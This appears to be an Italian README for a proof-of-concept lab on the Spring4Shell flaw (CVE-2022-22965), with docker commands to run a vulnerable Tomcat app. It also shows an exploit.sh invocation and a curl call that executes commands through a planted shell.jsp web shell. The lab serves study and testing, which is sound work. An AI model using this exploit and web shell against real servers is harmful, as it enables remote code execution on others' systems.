
PoC ed exploit per CVE-2022-22965 Spring4Shell
Spring4Shell (CVE-2022-22965) Proof Of Concept con un server Tomcat vulnerabile e un'applicazione spring4shell vulnerabile.
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
Puoi anche eseguirlo con la porta del debugger esposta, se necessario:
docker run -p 80:8080 –p 5005:5005 spring4shell
Consulta il post originale del blog per i dettagli sulla configurazione di un debugger remoto in IntelliJ Idea!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
Poi puoi eseguire qualsiasi comando da remoto in questo modo:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...oppure visitando l'URL sopra.